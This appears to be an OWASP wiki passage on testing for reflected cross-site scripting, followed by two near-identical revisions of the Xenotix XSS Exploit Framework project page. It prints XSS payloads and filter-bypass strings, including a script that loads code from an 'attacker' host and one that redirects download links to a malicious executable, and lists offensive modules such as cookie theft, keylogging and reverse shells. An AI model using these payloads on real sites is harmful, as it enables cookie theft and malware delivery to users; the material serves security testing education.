install key loggers, steal victim cookies, perform clipboard theft, and
change the content of the page (e.g., download links).

One of the primary difficulties in preventing XSS vulnerabilities is proper character encoding.
In some cases, the web server or the web application could not be filtering some
encodings of characters, so, for example, the web application might filter out "<script>",
but might not filter %3cscript%3e which simply includes another encoding of tags.

== Black Box testing and example ==
A black-box test will include at least three phases:

1. Detect input vectors. For each web page, the tester must determine all the web application's user-defined variables and how to input them. This includes hidden or non-obvious inputs such as HTTP parameters, POST data, hidden form field values, and predefined radio or selection values. Typically in-browser HTML editors or web proxies are used to view these hidden variables. See the example below.

2. Analyze each input vector to detect potential vulnerabilities. To detect an XSS vulnerability, the tester will typically use specially crafted input data with each input vector. Such input data is typically harmless, but trigger responses from the web browser that manifests the vulnerability. Testing data can be generated by using a web application fuzzer, an automated predefined list of known attack strings, or manually. <br />Some example of such input data are the following:
<pre>
<script>alert(123)</script>
</pre>
<pre>
“><script>alert(document.cookie)</script>
</pre>
For a comprehensive list of potential test strings, see the [[XSS Filter Evasion Cheat Sheet]].

3. For each test input attempted in the previous phase, the tester will analyze the result and determine if it represents a vulnerability that has a realistic impact on the web application's security. This requires examining the resulting web page HTML and searching for the test input. Once found, the tester identifies any special characters that were not properly encoded, replaced, or filtered out. The set of vulnerable unfiltered special characters will depend on the context of that section of HTML.

Ideally all HTML special characters will be replaced with HTML entities. The key HTML entities to identify are:
<pre>
> (greater than)
< (less than)
& (ampersand)
' (apostrophe or single quote)
" (double quote)
</pre>

However, a full list of entities is defined by the HTML and XML specifications. Wikipedia has a complete reference [http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references].

Within the context of an HTML action or JavaScript code, a different set of special characters will need to be escaped, encoded, replaced, or filtered out. These characters include:
<pre>
\n (new line)
\r (carriage return)
\' (apostrophe or single quote)
\" (double quote)
\\ (backslash)
\uXXXX (unicode values)
</pre>

For a more complete reference, see the Mozilla JavaScript guide. [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Values,_variables,_and_literals#Using_special_characters_in_strings]

=== Example 1 ===
For example, consider a site that has a welcome notice " Welcome %username% " and a download link.
<br><br>
[[Image:XSS Example1.png]]
<br><br>
The tester must suspect that every data entry point can result in an XSS attack. To analyze it, the tester will play with the user variable and try to trigger the vulnerability.
Let's try to click on the following link and see what happens:
<pre>http://example.com/index.php?user=<script>alert(123)</script></pre>

If no sanitization is applied this will result in the following popup:
<br><br>
[[Image:alert.png]]
<br><br>
This indicates that there is an XSS vulnerability and it appears that the tester can execute code of his choice in anybody's browser if he clicks on the tester's link.

=== Example 2 ===
Let's try other piece of code (link):
<pre>http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");
AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script> </pre>

This produces the following behavior:
<br><br>
[[Image:XSS Example2.png]]
<br><br>
This will cause the user, clicking on the link supplied by the tester, to download the file malicious.exe from a site he controls.

== Bypass XSS filters ==
Reflected cross-site scripting attacks are prevented as the web application sanitizes input, a web
application firewall blocks malicious input, or by mechanisms embedded in modern web browsers.

The tester must test for vulnerabilities assuming that web browsers will not prevent the attack. Browsers may be out of date, or have built-in security features disabled.

Similarly, web application firewalls are not guaranteed to recognize novel, unknown attacks. An attacker could craft an attack string that is unrecognized by the web application firewall.

Thus, the majority of XSS prevention must depend on the web application's sanitization of untrusted user input. There are several mechanisms available to developers for sanitization, such as returning an error, removing, encoding, or replacing invalid input. The means by which the application detects and corrects invalid input is another primary weakness in preventing XSS. A blacklist may not include all possible attack strings, a whitelist may be overly permissive, the sanitization could fail, or a type of input may be incorrectly trusted and remain unsanitized. All of these allow attackers to circumvent XSS filters.

The [[XSS Filter Evasion Cheat Sheet]] documents common filter evasion tests.

=== Example 3: Tag Attribute Value ===
<br>
Since these filters are based on a blacklist, they could not block every type of expressions. In fact, there are cases in which an XSS exploit can be carried out without the use of <script> tags and even without the use of characters such as " < > and / that are commonly filtered.
For example, the web application could use the user input value to fill an attribute, as shown in the following code:
<pre>
<input type="text" name="state" value="INPUT_FROM_USER">
</pre>

Then an attacker could submit the following code:
<pre>
" onfocus="alert(document.cookie)
</pre>

=== Example 4: Different syntax or enconding ===
<br>
In some cases it is possible that signature-based filters can be simply defeated by obfuscating the attack. Typically you can do this through the insertion of unexpected variations in the syntax or in the enconding. These variations are tolerated by browsers as valid HTML when the code is returned, and yet they could also be accepted by the filter.
Following some examples:
<pre>
"><script >alert(document.cookie)</script >
</pre>

<pre>
"><ScRiPt>alert(document.cookie)</ScRiPt>
</pre>

<pre>
"%3cscript%3ealert(document.cookie)%3c/script%3e
</pre>

=== Example 5: Bypassing non-recursive filtering ===
<br>
Sometimes the sanitization is applied only once and it is not being performed recursively. In this case the attacker can beat the filter by sending a string containing multiple attempts, like this one:
<pre>
<scr<script>ipt>alert(document.cookie)</script>
</pre>

=== Example 6: Including external script ===
<br>
Now suppose that developers of the target site implemented the following code to protect the input from the inclusion of external script:
<pre>
<?
$re = "/<script[^>]+src/i";

if (preg_match($re, $_GET['var']))
{
echo "Filtered";
return;
}
echo "Welcome ".$_GET['var']." !";
?>
</pre>

In this scenario there is a regular expression checking if <b><script [anything but the character: '>' ] src</b> is inserted. This is useful for filtering expressions like
<pre>
<script src="http://attacker/xss.js"></script>
</pre>
which is a common attack. But, in this case, it is possible to bypass the sanitization by using the ">" character in an attribute between script and src, like this:
<pre>
http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>
</pre>
This will exploit the reflected cross site scripting vulnerability shown before, executing the javascript code stored on the attacker's web server as if it was
originating from the victim web site, http://example/.

=== Example 7: HTTP Parameter Pollution (HPP) ===
<br>
Another method to bypass filters is the HTTP Parameter Pollution, this technique was first presented by Stefano di Paola and Luca Carettoni in 2009 at the OWASP
Poland conference. See the [[Testing for HTTP Parameter pollution (OWASP-DV-004)|Testing for HTTP Parameter pollution]] for more information.
This evasion technique consists of splitting an attack vector between multiple parameters that have the same name. The manipulation of the value of each
parameter depends on how each web technology is parsing these parameters, so this type of evasion is not always possible.
If the tested environment concatenates the values of all parameters with the same name, then an attacker could use this technique in order to bypass pattern-
based security mechanisms.
<br>
Regular attack:
<pre>
http://example/page.php?param=<script>[...]</script>
</pre>
Attack using HPP:
<pre>
http://example/page.php?param=<script&param=>[...]</&param=script>
</pre>

''' Result expected '''
<br>
See the [[XSS Filter Evasion Cheat Sheet]] for a more detailed list of filter evasion techniques.
Finally, analyzing answers can get complex. A simple way to do this is to use code that pops up a dialog, as in our example. This typically indicates that an attacker could execute arbitrary JavaScript of his choice in the visitors' browsers.

== Gray Box testing ==
Gray Box testing is similar to Black box testing. In gray box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and how the user input is rendered back to the user might be known by the pen-tester.

If source code is available (White Box), all variables received from users should be analyzed. Moreover the tester should analyze any sanitization procedures implemented to decide if these can be circumvented.

== References ==
'''OWASP Resources'''<br>
*[[XSS Filter Evasion Cheat Sheet]]
'''Books'''<br>
* Joel Scambray, Mike Shema, Caleb Sima - "Hacking Exposed Web Applications", Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0
* Dafydd Stuttard, Marcus Pinto - "The Web Application's Handbook - Discovering and Exploiting Security Flaws", 2008, Wiley, ISBN 978-0-470-17077-9
* Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager, Seth Fogie - "Cross Site Scripting Attacks: XSS Exploits and Defense", 2007, Syngress, ISBN-10: 1-59749-154-3
'''Whitepapers'''<br>
* '''CERT''' - Malicious HTML Tags Embedded in Client Web Requests: [http://www.cert.org/advisories/CA-2000-02.html Read]
* '''Rsnake''' - XSS Cheat Sheet: [http://ha.ckers.org/xss.html Read]
* '''cgisecurity.com''' - The Cross Site Scripting FAQ: [http://www.cgisecurity.com/articles/xss-faq.shtml Read]
* '''G.Ollmann''' - HTML Code Injection and Cross-site scripting: [http://www.technicalinfo.net/papers/CSS.html Read]
* '''A. Calvo, D.Tiscornia''' - alert('A javascritp agent'): [http://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=publication&name=alert%28A_javascritp_agent%29 Read] ( To be published )
* '''S. Frei, T. Dübendorfer, G. Ollmann, M. May''' - Understanding the Web browser threat: [http://www.techzoom.net/publications/insecurity-iceberg/index.en Read]
'''Tools''' <br>
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]'''
CAL9000 is a collection of web application security testing tools that complement the feature set of current web proxies and automated scanners. It's hosted as a reference at http://yehg.net/lab/pr0js/pentest/CAL9000/ .
* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding [mirror: http://yehg.net/e ]
This tool helps you encode arbitrary texts to and from 65 kinds of charsets. Also some encoding functions featured by JavaScript are provided.
* '''HackVertor''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
It provides multiple dozens of flexible encoding for advanced string manipulation attacks.
* '''[[OWASP WebScarab Project|WebScarab]]'''
WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols.
* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.
* '''ratproxy''' - http://code.google.com/p/ratproxy/
A semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.
* '''Burp Proxy''' - http://portswigger.net/proxy/
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications.
* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
* '''OWASP Xenotix XSS Exploit Framework''' - [[OWASP_Xenotix_XSS_Exploit_Framework]]
OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

OWASP Xenotix XSS Exploit Framework

2014-05-15T15:41:29Z

Ajin Abraham: image resize

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]
* [[OWASP_AntiSamy_Project]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

Requirements
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-04-10T11:30:57Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]
* [[OWASP_AntiSamy_Project]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

Requirements
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

